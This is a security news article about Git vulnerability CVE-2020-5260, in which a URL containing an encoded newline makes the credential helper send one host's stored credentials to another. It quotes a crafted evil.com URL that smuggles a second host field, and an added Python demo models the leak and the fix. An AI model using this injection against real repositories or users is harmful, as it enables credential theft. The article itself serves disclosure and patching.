Git credential leakage vulnerability

Corrective releases of the distributed source control system Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 and 2.17.4 have been published. They fix a vulnerability (CVE-2020-5260) in the "credential.helper" handler that causes credentials to be sent to the wrong host when the git client accesses a repository through a specially crafted URL containing a newline character. The vulnerability can be exploited to arrange for credentials for one host to be sent to a server controlled by the attacker.

When a URL such as "https://evil.com?%0ahost=github.com/" is specified, the credential helper, while connecting to the host evil.com, hands over the credentials stored for github.com. The problem occurs during operations such as "git clone", including the processing of submodule URLs (for example, "git submodule update" processes the URLs listed in the repository's .gitmodules file). The vulnerability is especially dangerous in situations where the user accesses a repository without seeing the URL, for example when working with submodules, or in systems that perform automated actions, such as package build systems.

To block the vulnerability, the new releases refuse to pass a newline in any value transmitted through the credential exchange protocol. For distributions, the release of package updates can be tracked on the pages of Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch and FreeBSD.
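To make the two preceding paragraphs concrete, here is an added illustration (not code from the Git project) that models the credential exchange protocol in simplified form: the client turns a URL into key=value lines, and a helper reads them back with the last occurrence of a key winning. The URL-splitting and helper functions are simplified assumptions about git's behaviour, not its real code; they are only enough to show why a percent-encoded newline in the host part lets the crafted URL from the text smuggle a second "host=" line, and how the fix (rejecting any value containing a newline) stops it.

```python
from urllib.parse import unquote

# Constructed sample inputs: the crafted URL quoted in the article and a benign one.
CRAFTED_URL = "https://evil.com?%0ahost=github.com/"
BENIGN_URL = "https://github.com/example/repo.git"

# Constructed credential store standing in for what a helper would return.
FAKE_STORE = {"github.com": ("alice", "token-for-github")}


def credential_from_url(url):
    """Simplified model (an assumption, not git's code): the host is whatever
    sits between '://' and the first '/', percent-decoded. Decoding is what
    turns %0a into a real newline inside the host field."""
    scheme, rest = url.split("://", 1)
    host = rest.split("/", 1)[0]
    return {"protocol": scheme, "host": unquote(host)}


def serialize_vulnerable(fields):
    """Pre-fix behaviour: emit key=value lines with no check on the values."""
    return "".join(f"{k}={v}\n" for k, v in fields.items()) + "\n"


def serialize_fixed(fields):
    """Fixed behaviour described in the article: refuse any value that
    contains a newline, because a newline would start a new protocol line."""
    for k, v in fields.items():
        if "\n" in v:
            raise ValueError(f"credential value for '{k}' contains a newline")
    return serialize_vulnerable(fields)


def helper_parse(text):
    """Model of the helper side: one key=value per line, a blank line ends the
    request, and a repeated key overwrites the earlier value."""
    fields = {}
    for line in text.split("\n"):
        if line == "":
            break
        key, _, value = line.partition("=")
        fields[key] = value
    return fields


def helper_lookup(fields, store=FAKE_STORE):
    """Return the stored credential for the host the helper believes it saw."""
    return store.get(fields.get("host"))


def run_demo(url):
    """Return (host the vulnerable helper resolved, credential it would hand
    out, whether the fixed serializer accepted the URL)."""
    fields = credential_from_url(url)
    seen = helper_parse(serialize_vulnerable(fields))
    try:
        serialize_fixed(fields)
        accepted = True
    except ValueError:
        accepted = False
    return seen["host"], helper_lookup(seen), accepted


if __name__ == "__main__":
    for u in (BENIGN_URL, CRAFTED_URL):
        host, cred, ok = run_demo(u)
        print(f"{u}\n  vulnerable helper saw host={host!r}, "
              f"credential={cred}, fixed serializer accepts={ok}")
```

Running the script shows that for the crafted URL the vulnerable path makes the helper resolve "github.com" and hand out the github.com token even though the connection goes to evil.com, while the fixed serializer rejects the request outright; the benign URL behaves identically on both paths.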

As a workaround, it is recommended not to use credential.helper when accessing public repositories and not to run "git clone" in "--recurse-submodules" mode with untrusted repositories. To completely disable the credential.helper handler, which saves and retrieves passwords from a cache, a secure store or a file containing passwords, the following commands can be used:

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

Source: opennet.ru
